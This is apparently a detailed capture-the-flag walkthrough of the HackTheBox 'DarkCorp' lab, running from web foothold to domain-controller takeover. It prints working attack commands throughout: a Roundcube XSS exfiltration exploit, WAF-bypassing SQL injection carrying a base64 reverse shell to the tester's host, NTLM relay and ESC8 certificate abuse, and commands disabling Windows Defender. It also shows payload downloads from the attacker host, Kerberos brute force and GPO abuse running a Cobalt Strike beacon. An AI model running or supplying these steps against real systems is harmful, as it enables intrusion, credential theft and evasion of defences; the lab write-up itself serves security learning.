DarkCorp

Detailed Walkthrough

Initial foothold

Upon establishing a connection to the VPN, the tester initiated the assessment by performing a service enumeration. This process revealed and HTTP service running on 80/TCP port, which is redirected to drip.htb .

Additionally, The ffuf tool was executed which successfully discovered a subdomain associated with the host.

❯ ffuf -c -u 'http://drip.htb/' -H 'Host: FUZZ.drip.htb' -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -t 500 -fs 64

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://drip.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
 :: Header           : Host: FUZZ.drip.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 500
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 64
________________________________________________

mail                    [Status: 200, Size: 5323, Words: 366, Lines: 97, Duration: 128ms]

Adding the subdomain mail.drip.htb to the hosts file and navigated to it, it was discovered an RoundCube instance running under the subdomain.

Roundcube is a free, open-source, and browser-based webmail application that functions as an IMAP client. It all^ows users to send, receive, and organize emails directly from any web browser without installing any software on their computer.

The tester created a new user account and successfully authenticated to the Dripmail application.

Once authenticated, it was identified drip.darkcorp.htb as an additional subdomain, an email account support@drip.htb, Roundcube version 1.6.7, and confirmed the presence of two Roundcube plugins: filesystem_attachments and jqueryui installed on the application.

Contact Form Misconfiguration

Further enumeration on http://drip.htb revealed a /contact endpoint that was improperly misconfigured. The tester intercepted requests using Burp Suite and confirmed that the recipient parameter is fully user-controllable, allowing messages to be sent to arbitrary addresses without proper validation.

POST /contact HTTP/1.1

Host: drip.htb

Content-Length: 106

Cache-Control: max-age=0

Accept-Language: en-US,en;q=0.9

Origin: http://drip.htb

Content-Type: application/x-www-form-urlencoded

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Referer: http://drip.htb/index

Accept-Encoding: gzip, deflate, br

Cookie: session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiYzY4ZGQwZDM5MTY0OWQzOWFjYTZiZjUxNjJmMTQ0YTc4ODY4NWI5MSJ9.aNIOoA.rBpMe5_fR6NjC53X4Z67HgbWsqI

Connection: keep-alive



name=Intrusionz3r0&email=tester%40drip.htb&message=this+is+a+text&content=text&recipient=tester%40drip.htb

To confirm this behavior, the tester sent a post request to /contact to the account previously created as recipient and retrieved a confidential note which revealed a new user account bcase@drip.htb.

Stored Cross-Site Scripting (XSS) in Roundcube Webmail

Later during the enumeration phase, a stored cross-site scripting (XSS) vulnerability was discovered in the Roundcube webmail instance, affecting version 1.6.7. This vulnerability allows an attacker to inject a malicious payload into the webmail system, which is triggered when the target opens the affected email, resulting in the exfiltration of the entire webmail content.

Using this information, it was downloaded the exploit associated to the vulnerability CVE-2024-42009 and executed. Which successfully exfiltrated private emails for bcase@drip.htb and revealed a new subdomain, dev-a3f1-01.drip.htb, exposing additional avenues for further exploitation.

❯ python3 exploit.py -u 'http://drip.htb/contact' -r bcase@drip.htb -l 10.10.15.44 -p 1234
[*] Crafting payload for http://drip.htb/contact with recipient bcase@drip.htb
[*] Sending payload to http://drip.htb/contact with recipient bcase@drip.htb
[*] Starting HTTP server on port 1234
[+] HTTP server listening on port 1234
[*] Waiting for emails... (Press Ctrl+C to stop manually)
[*] POST request to: /?emails=found
[+] Received 3 emails!

<SNIF>
------------------------------------------------------------
📧 EMAIL UID: 2
------------------------------------------------------------
From: ebelford
Subject: Analytics Dashboard

Message:
Hey Bryce,
The Analytics dashboard is now live. While it's still in development and limited in functionality, it should provide a good starting point for gathering metadata on the users currently using our service.
You can access the dashboard at dev-a3f1-01.drip.htb. Please note that you'll need to reset your password before logging in.
If you encounter any issues or have feedback, let me know so I can address them promptly.
Thanks
------------------------------------------------------------
<SNIF>

[+] Email exfiltration complete! Shutting down server...
[*] Shutting down server...
[+] Server stopped successfully!

Abusing the Forgot Password funcionality and CVE-2024-42009

While navigating dev-a3f1-01.drip.htb, a password-reset function was identified and chained with the Roundcube stored XSS (CVE-2024-42009), allowing the bcase@drip.htb password to be reset.

❯ python3 exploit.py -u 'http://drip.htb/contact' -r bcase@drip.htb -l 10.10.15.44 -p 1234
[*] Crafting payload for http://drip.htb/contact with recipient bcase@drip.htb
[*] Sending payload to http://drip.htb/contact with recipient bcase@drip.htb
[*] Starting HTTP server on port 1234
[+] HTTP server listening on port 1234
[*] Waiting for emails... (Press Ctrl+C to stop manually)
[*] POST request to: /?emails=found
[+] Received 5 emails!



------------------------------------------------------------
📧 EMAIL UID: 3
------------------------------------------------------------
From: no-reply@drip.htb
Subject: Reset token

Message:
Your reset token has generated.  Please reset your password within the next 5 minutes.
You may reset your password here:
http://dev-a3f1-01.drip.htb/reset/ImJjYXNlQGRyaXAuaHRiIg.aNIXDg.-Kph-5JxQrB9c4a6EwXoD262JD0
------------------------------------------------------------


[+] Email exfiltration complete! Shutting down server...
[*] Shutting down server...
[+] Server stopped successfully!

Using the credentials, the tester successfully authenticated on dev-a3f1-01.drip.htb.

Discovering SQL vulnerability

During assessment of dev-a3f1-01.drip.htb, it was identified a SQL injection vulnerability associated to Psycopg2 within the query (search) parameter along with a web application firewall (WAF) implemented.

Exploiting SQLi Injection

To bypass the WAF and gain access to the system, the tester crafted an obfuscated payload and sent it, resulting in the compromise of the server.

#WAF bypass using Replace
query=''; DO $$ DECLARE c TEXT; BEGIN 
    c := REPLACE('C'||'O'||'P'||'Y', 'X', '') || ' (SELECT '''') ' || 
         REPLACE('T'||'O', 'X', '') || ' ' || 
         REPLACE('P'||'R'||'O'||'G'||'R'||'A'||'M', 'X', '') || ' ''echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE1LjQ0LzEyMzQgMD4mMQ==|base64 -d|bash''';
    EXECUTE c; 
END $$;

#WAF bypass using CHR()
query=''; DO $$ 

DECLARE 
    comando TEXT;
BEGIN 
    comando := CHR(67)||CHR(79)||CHR(80)||CHR(89) || ' (SELECT '''') ' ||  CHR(84)||CHR(79) || ' ' || CHR(80)||CHR(82)||CHR(79)||CHR(71)||CHR(82)||CHR(65)||CHR(77) || '''curl 10.10.15.44''';
    EXECUTE comando; 
END $$;

#WAF bypass using Hex String
query=''; DO $$ DECLARE c TEXT; BEGIN 
    c := CONVERT_FROM('\x434f5059', 'UTF8') || ' (SELECT '''') ' || 
         CONVERT_FROM('\x544f', 'UTF8') || ' ' || 
         CONVERT_FROM('\x50524f4752414d', 'UTF8') || ' ''curl 10.10.15.44''';
    EXECUTE c; 
END $$;

Access internal Network

Decrypting GPG files

During server enumeration, it was a retrieved the application configuration file containing database credentials for the dripmail_dba account:

# excerpt from environment configuration
DB_ENGINE=postgresql
DB_HOST=localhost
DB_NAME=dripmail
DB_USERNAME=dripmail_dba
DB_PASS=<SNIF>

SQLALCHEMY_DATABASE_URI='postgresql://dripmail_dba:<SNIF>@localhost/dripmail'
MAIL_DEFAULT_SENDER='support@drip.htb'

Along with a SQL database dump located at /var/backups/postgres/dev-dripmail.old.sql.gpg and GPG keys for the postgres user.

postgres@drip:/var/backups/postgres$ ls
dev-dripmail.old.sql.gpg
postgres@drip:/var/backups/postgres$ gpg --list-keys
/var/lib/postgresql/.gnupg/pubring.kbx
--------------------------------------
pub   rsa3072 2025-01-08 [SC] [expires: 2027-01-08]
      3AA1F620319ABF74EF5179C0F426B2D867825D9F
uid           [ultimate] postgres <postgres@drip.darkcorp.htb>
sub   rsa3072 2025-01-08 [E] [expires: 2027-01-08]

The tester used the credentials obtained from the environment file to successfully decrypt the backup:

postgres@drip:/var/lib/postgresql/.gnupg$ gpg --batch --yes --passphrase '<SNIF>' --pinentry-mode loopback --decrypt /var/backups/postgres/dev-dripmail.old.sql.gpg > /dev/shm/decrypt_backup
gpg: encrypted with 3072-bit RSA key, ID 1112336661D8BC1F, created 2025-01-08
      "postgres <postgres@drip.darkcorp.htb>"

The decrypted backup contained sensitive application data, including entries from the Admins table. Several credential hashes were extracted from the dump and subsequently cracked using hashcat, retrieving plaintext credentials for multiple users.


postgres@drip:/var/lib/postgresql/.gnupg$ cat 

postgres@drip:/dev/shm$ cat decrypt_backup
<SNIF>
COPY public."Admins" (id, username, password, email) FROM stdin;
1	bcase	dc548xxxxxxxxxxxxxxxxxxxxxe7225	bcase@drip.htb
2   victor.r    cac1c7xxxxxxxxxxxxxxxxxxxxx6b9c0    victor.r@drip.htb
3   ebelford    8bbd7xxxxxxxxxxxxxxxx69be86    ebelford@drip.htb
<SNIF>

Credentials found:

victor.r:<SNIF>
ebelford::<SNIF>

Setting up tunneling with sshuttle

After obtaining ebelford’s credentials, it was discovered an internal network route for 172.16.20.0/24.

ebelford@drip:/dev/shm/.Intrusionz3r0$ route -4
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         DC-01           0.0.0.0         UG    0      0        0 eth0
172.16.20.0     0.0.0.0         255.255.255.0   U     0      0        0 eth0

A quick ping sweep confirmed multiple live hosts on the subnet, indicating an internal networ worth pivoting into.

ebelford@drip:/dev/shm/.Intrusionz3r0$ for i in {1..254} ;do (ping -c 1 172.16.20.$i | grep "bytes from" &) ;done
64 bytes from 172.16.20.1: icmp_seq=1 ttl=128 time=1.93 ms
64 bytes from 172.16.20.2: icmp_seq=1 ttl=128 time=2.82 ms
64 bytes from 172.16.20.3: icmp_seq=1 ttl=64 time=0.027 ms

To access to the internal network from the tester’s machine, the tester established a SSH-based tunnel using sshuttle:

❯ sudo sshuttle -r ebelford@10.10.11.54 172.16.20.0/24 -v
Starting sshuttle proxy (version 1.3.2).
Connecting to server...
The authenticity of host '10.10.11.54 (10.10.11.54)' can't be established.
ED25519 key fingerprint is SHA256:JNw/rUlpDzlUEzvKKKFQ/M4prRH35ZhHammHWv47SkY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.54' (ED25519) to the list of known hosts.
ebelford@10.10.11.54's password: 
 s: Running server on remote host with /usr/bin/python3 (version 3.11.2)
 s: latency control setting = True
 s: auto-nets:False
c : Connected to server.
fw: setting up.
fw: ip6tables -w -t nat -N sshuttle-12300
fw: ip6tables -w -t nat -F sshuttle-12300
fw: ip6tables -w -t nat -I OUTPUT 1 -j sshuttle-12300
fw: ip6tables -w -t nat -I PREROUTING 1 -j sshuttle-12300
fw: ip6tables -w -t nat -A sshuttle-12300 -j RETURN --dest ::1/128 -p tcp
fw: ip6tables -w -t nat -A sshuttle-12300 -j RETURN -m addrtype --dst-type LOCAL
fw: iptables -w -t nat -N sshuttle-12300
fw: iptables -w -t nat -F sshuttle-12300
fw: iptables -w -t nat -I OUTPUT 1 -j sshuttle-12300
fw: iptables -w -t nat -I PREROUTING 1 -j sshuttle-12300
fw: iptables -w -t nat -A sshuttle-12300 -j RETURN --dest 127.0.0.1/32 -p tcp
fw: iptables -w -t nat -A sshuttle-12300 -j REDIRECT --dest 172.16.20.0/24 -p tcp --to-ports 12300
fw: iptables -w -t nat -A sshuttle-12300 -j RETURN -m addrtype --dst-type LOCAL

Compromise WEB-01

Once the tunnel was established, Internal Active Directory enumeration was performed to map domain objects and identify escalation paths. The tester used dnschef to spoof internal DNS responses and bloodhound-python to collect LDAP data and build an attack graph, which revealed domain users, groups, GPOs and computers for further analysis.

❯ dnschef --fakeip 172.16.20.1 --fakedomains darkcorp.htb
❯ bloodhound-python -c all  -u 'victor.r' -p '<SNIF>'  -d darkcorp.htb -dc DC-01.darkcorp.htb -ns 127.0.0.1 --disable-pooling -w 1 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
INFO: Connecting to LDAP server: DC-01.darkcorp.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: DC-01.darkcorp.htb
INFO: Found 13 users
INFO: Found 54 groups
INFO: Found 3 gpos
INFO: Found 4 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 1 workers
INFO: Querying computer: WEB-01.darkcorp.htb
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: [Errno Connection error (172.16.20.1:445)] timed out
INFO: Ignoring host WEB-01.darkcorp.htb since its hostname does not match: Supplied hostname web-01.darkcorp.htb does not match reported hostnames dc-01 or dc-01.darkcorp.htb
INFO: Querying computer: drip.darkcorp.htb
INFO: Ignoring host drip.darkcorp.htb since its hostname does not match: Supplied hostname drip.darkcorp.htb does not match reported hostnames dc-01 or dc-01.darkcorp.htb
INFO: Querying computer: DC-01.darkcorp.htb
INFO: Done in 01M 22S
INFO: Compressing output into 20250923151538_bloodhound.zip

Executing Certipy

Additionally, certipy-ad was used to enumerated Certificate Authority configuration which identified a potential ESC8-related vulnerability on DARKCORP-DC-01-CA.

❯ certipy-ad find  -u 'victor.r' -p '<SNIF>' -dc-host DC-01.darkcorp.htb -dc-ip 172.16.20.1 -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'DARKCORP-DC-01-CA' via RRP
[*] Successfully retrieved CA configuration for 'DARKCORP-DC-01-CA'
[*] Checking web enrollment for CA 'DARKCORP-DC-01-CA' @ 'DC-01.darkcorp.htb'
[!] Failed to check channel binding: NTLM not supported. Try using Kerberos authentication (-k and -dc-host).
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : DARKCORP-DC-01-CA
    DNS Name                            : DC-01.darkcorp.htb
    Certificate Subject                 : CN=DARKCORP-DC-01-CA, DC=darkcorp, DC=htb
    Certificate Serial Number           : 27637AF630C1D39945283AF47C89040C
    Certificate Validity Start          : 2024-12-29 23:24:10+00:00
    Certificate Validity End            : 2125-01-22 12:18:28+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : True
        Channel Binding (EPA)           : Unknown
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : DARKCORP.HTB\Administrators
      Access Rights
        ManageCa                        : DARKCORP.HTB\Administrators
                                          DARKCORP.HTB\Domain Admins
                                          DARKCORP.HTB\Enterprise Admins
        ManageCertificates              : DARKCORP.HTB\Administrators
                                          DARKCORP.HTB\Domain Admins
                                          DARKCORP.HTB\Enterprise Admins
        Enroll                          : DARKCORP.HTB\Authenticated Users
    [*] Remarks
      ESC8                              : Channel Binding couldn't be verified for HTTPS Web Enrollment. For manual verification, request a certificate via HTTPS with Channel Binding disabled and observe if the request succeeds or is rejected.
Certificate Templates                   : [!] Could not find any certificate templates

NTLM relay, reverse tunnelling & ESC8 abuse

During internal enumeration, it was also identified that WEB-01 (172.16.20.2) was susceptible to NTLM relay attacks because SMB signing was not enforced.

❯ nxc smb 172.16.20.2 -u 'victor.r' -p '<SNIF>' -M coerce_plus
SMB         172.16.20.2     445    WEB-01           [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:darkcorp.htb) (signing:False) (SMBv1:False) 
SMB         172.16.20.2     445    WEB-01           [+] darkcorp.htb\victor.r:<SNIF>
COERCE_PLUS 172.16.20.2     445    WEB-01           VULNERABLE, PetitPotam
COERCE_PLUS 172.16.20.2     445    WEB-01           VULNERABLE, PrinterBug
COERCE_PLUS 172.16.20.2     445    WEB-01           VULNERABLE, PrinterBug
COERCE_PLUS 172.16.20.2     445    WEB-01           VULNERABLE, MSEven

An attempt to add a DNS record directly via LDAP (to support ESC8) failed due to insufficient privileges for victor.r:

❯ bloodyAD -k --host DC-01.darkcorp.htb -d darkcorp.htb -u victor.r -p '<SNIF>' add dnsRecord 'DC-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.15.44
Traceback (most recent call last):
  File "/usr/bin/bloodyAD", line 8, in <module>
    sys.exit(main())
             ~~~~^^
  File "/usr/lib/python3/dist-packages/bloodyAD/main.py", line 201, in main
    output = args.func(conn, **params)
  File "/usr/lib/python3/dist-packages/bloodyAD/cli_modules/add.py", line 185, in dnsRecord
    conn.ldap.bloodyadd(record_dn, attributes=record_attr)
    ~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/bloodyAD/network/ldap.py", line 192, in bloodyadd
    raise err
msldap.commons.exceptions.LDAPAddException: LDAP Add operation failed on DN DC=DC-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA,DC=darkcorp.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=darkcorp,DC=htb! Result code: "insufficientAccessRights" Reason: "b'00000005: SecErr: DSID-03152E29, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0\n\x00'"

The 172.16.20.2 server was running an application on WEB-01 which apparently made a HTTP authentication that could be used to relay an HTTP authentication to DC-01 via ntlmrelayx tool to create the fake DNS and abuse of ESC8 by requesting a Machine certificate to finally request a Service Ticket as Administrator and compromise the WEB-01.

Setting an Reverse PortForwarding

To abuse the NTLM relay authentication, the tester had to set up an Reverse Port Forwarding using chisel to redirect all the incoming connections from drip.dark.htb to tester's machine which in turn relay the authentication to add the fake DNS.

❯ Intrusionz3r0@kali:$ ./chisel_1.10.1_linux_amd64 server -port 1234 --reverse
❯ ebelford@drip:/dev/shm$ ./chisel client 10.10.15.44:1234 -v 8080:0.0.0.0:80

Once configuration was completed, the tester proceeded to run impacket-ntlmrelayx and perform the authentication request by triggering through Real Time Status Monitor application, successfully adding the fake domain.

❯ impacket-ntlmrelayx -t "ldap://172.16.20.1" --add-dns-record 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.15.44
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Connection from 127.0.0.1 controlled, attacking target ldap://172.16.20.1
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Authenticating against ldap://172.16.20.1 as DARKCORP/SVC_ACC SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Checking if domain already has a `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` DNS record
[*] Domain does not have a `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` record!
[*] Adding `A` record `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` pointing to `10.10.15.44` at `DC=dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA,DC=darkcorp.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=darkcorp,DC=htb`
[*] Added `A` record `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA`. DON'T FORGET TO CLEANUP (set `dNSTombstoned` to `TRUE`, set `dnsRecord` to a NULL byte)
[*] Dumping domain info for first time
[*] Domain info dumped into lootdir!

Abusing ESC8

After the DNS record was added, it was utilized krbrelayx and PetitPotam to coerce the authentication and abuse of ESC8 to generate a WEB-01 machine certificate.

❯ python3 krbrelayx.py -t 'https://DC-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs --template 'Machine' -v 'WEB-01' -dc-ip 172.16.20.1
❯ python3 PetitPotam.py -u victor.r -p '<SNIF>' -d darkcorp.htb 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 172.16.20.2
/home/Intrusionz3r0/Documents/Tools/krbrelayx/env/lib/python3.13/site-packages/impacket/examples/ntlmrelayx/attacks/__init__.py:20: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.11.54
[*] HTTP server returned status code 200, treating as a successful login
[*] SMBD: Received connection from 10.10.11.54
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] Skipping user WEB-01 since attack was already performed
[*] GOT CERTIFICATE! ID 6
[*] Writing PKCS#12 certificate to ./WEB-01.pfx
[*] Certificate successfully written to file

Using certipy-ad tool, it was possible to extracted the web-01$ NTLM hash computer account.

❯ certipy-ad auth -pfx WEB-01.pfx -dc-ip 172.16.20.1 -username 'web-01$'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN DNS Host Name: 'WEB-01.darkcorp.htb'
[*]     Security Extension SID: 'S-1-5-21-3432610366-2163336488-3604236847-20601'
[*] Using principal: 'web-01$@darkcorp.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'web-01.ccache'
[*] Wrote credential cache to 'web-01.ccache'
[*] Trying to retrieve NT hash for 'web-01$'
[*] Got hash for 'web-01$@darkcorp.htb': aad3b435b51404eeaad3b435b51404ee:8f33cxxxxxxxxxxxxxxxxxxxxxfbb8b675

Requesting Ticket Service as administrator on WEB

By utilizing the web-01$ computer account, the tester request a TGT using S4u2self to impersonate administrator and generate a TGS for CIFS service and compromise the server via impacket-wmiexec.

❯ impacket-getST -self -impersonate Administrator -altservice CIFS/WEB-01.darkcorp.htb darkcorp.htb/web-01$ -hashes :8f33cxxxxxxxxxxxxxxxxxxxxxfbb8b675
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Changing service from web-01$@DARKCORP.HTB to CIFS/WEB-01.darkcorp.htb@DARKCORP.HTB
[*] Saving ticket in Administrator@CIFS_WEB-01.darkcorp.htb@DARKCORP.HTB.ccache

❯ export KRB5CCNAME=Administrator@CIFS_WEB-01.darkcorp.htb@DARKCORP.HTB.ccache
❯ impacket-wmiexec -k -no-pass WEB-01.darkcorp.htb -shell-type powershell
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
PS C:\>

PS c:\Temp> cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all

Service Version: 4.18.24090.11
Engine Version: 1.1.24090.11
AntiSpyware Signature Version: 1.421.1388.0
AntiVirus Signature Version: 1.421.1388.0

Starting engine and signature rollback to none...
Done!

PS c:\Temp> Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true -DisableBehaviorMonitoring $true -DisableIOAVProtection $true -DisableIntrusionPreventionSystem $true
PS C:\Temp> IWR -URI http://10.10.15.44:8081/beacon_x64.exe -Outfile beacon_x64.exe
PS C:\Temp> .\beacon_x64.exe

Compromise domain controller

By reviewing the BloodHound output, it was identified that the user taylor.b.adm was a member of GPO_manager. That group had delegated permissions (WriteOwner, GenericWrite, WriteDacl) over the SECURITYUPDATES GPO. These privileges created a plausible path to escalate privileges by modifying the GPO to execute code on domaim controller.

Extracted administrator credentials

With no leads on how to compromise taylor.b.adm, the tester performed a brute‑force attack against the account using kerbrute.

❯ ~/Documents/Tools/kerbrute/kerbrute bruteuser -d darkcorp.htb --dc 172.16.20.1 /usr/share/wordlists/rockyou.txt' taylor.b.adm' -t 250 -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 09/25/25 - Ronnie Flathers @ropnop

2025/09/25 19:42:51 >  Using KDC(s):
2025/09/25 19:42:51 >  	172.16.20.1:88
<SNIF>
2025/09/25 19:42:56 >  [+] VALID LOGIN:	taylor.b.adm@darkcorp.htb:<SNIF>
<SNIF>

Bypassing AV

After authenticating as taylor.b.adm, the presence of antivirus software on the system was identified. To bypass it, a loader was crafted in C++ using a combination of techniques, including Early Bird Injection, Function Call Obfuscation, Sandbox Evasion, and shellcode encryption.

*Evil-WinRM* PS C:\Users\taylor.b.adm\Documents> IWR -URI http://10.10.15.44:8081/Intrusionz3r0.exe -Outfile Intrusionz3r0.exe
*Evil-WinRM* PS C:\Users\taylor.b.adm\Documents> .\Intrusionz3r0.exe

Based on discovered GPO privileges and acquired credentials, SharpGPOAbuse was used to add a computer scheduled task to the SECURITYUPDATES GPO, which in turn executed a custom Cobalt Strike beacon, resulting in the compromise of the domain controller.

[09/25 20:19:56] beacon> execute-assembly /home/Intrusionz3r0/Documents/Tools/SharpCollection/NetFramework_4.7_x64/SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --GPOName "SECURITYUPDATES" --Author darkcorp\Administrator --Command "C:\Temp\Intrusionz3r0.exe" --Arguments "C:\Temp\payload_x64.bin.rc4.enc"
[09/25 20:19:56] [*] Tasked beacon to run .NET program: SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --GPOName "SECURITYUPDATES" --Author darkcorp\Administrator --Command "C:\Temp\Intrusionz3r0.exe" --Arguments "C:\Temp\payload_x64.bin.rc4.enc"
[09/25 20:19:57] [+] host called home, sent: 180264 bytes
[09/25 20:19:58] [+] received output:
[+] Domain = darkcorp.htb

[+] Domain Controller = DC-01.darkcorp.htb

[+] Distinguished Name = CN=Policies,CN=System,DC=darkcorp,DC=htb

[+] GUID of "SECURITYUPDATES" is: {652CAE9A-4BB7-49F2-9E52-3361F33CE786}

[+] Creating file \\darkcorp.htb\SysVol\darkcorp.htb\Policies\{652CAE9A-4BB7-49F2-9E52-3361F33CE786}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml


[09/25 20:19:58] [+] received output:
[+] versionNumber attribute changed successfully

[+] The version number in GPT.ini was increased successfully.

[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!


[09/25 20:20:12] beacon> shell gpupdate /force
[09/25 20:20:12] [*] Tasked beacon to run: gpupdate /force
[09/25 20:20:12] [+] host called home, sent: 46 bytes
[09/25 20:20:25] [+] received output:
Updating policy...





Computer Policy update has completed successfully.


User Policy update has completed successfully.

Credentials

Username

Password

Methods

Scope

Notes

tester

<SNIF>

User registration

DripMail webmail

dripmail_dba

<SNIF>

SQLi

postgresql

victor.r

<SNIF>

PostgreSQL backup

ebelford

<SNIF>

PostgreSQL backup

DRIP Local User (SSH)

taylor.b.adm

<SNIF>

Brute Force

GPO_Mananger

👤 Users wordlist

Administrator
dripmail_dba
victor.r
svc_acc
john.w
angela.w
angela.w.adm
taylor.b
taylor.b.adm
eugene.b
bryce.c

🔑 Password wordlist

<SNIF>
<SNIF>
<SNIF>
<SNIF>
<SNIF>

Subdomains / Hosts

Subdomain / Host

Host

Description

Notes

drip.htb

10.10.11.54

nmap scan.

mail.drip.htb

10.10.11.54

Discovered via VHost enumeration

drip.darkcorp.htb

10.10.11.54

Extracted from Message headers

DC-01.darkcorp.htb

172.16.20.1

Domain Controller

Host Discovered

Scans

# Nmap 7.95 scan initiated Fri Sep 12 23:35:19 2025 as: /usr/lib/nmap/nmap -p- --open -T5 -Pn -n -A -oN 10.10.11.54_tcp_allports -vvv 10.10.11.54
Nmap scan report for 10.10.11.54
Host is up, received user-set (0.076s latency).
Scanned at 2025-09-12 23:35:19 EDT for 155s
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON          VERSION
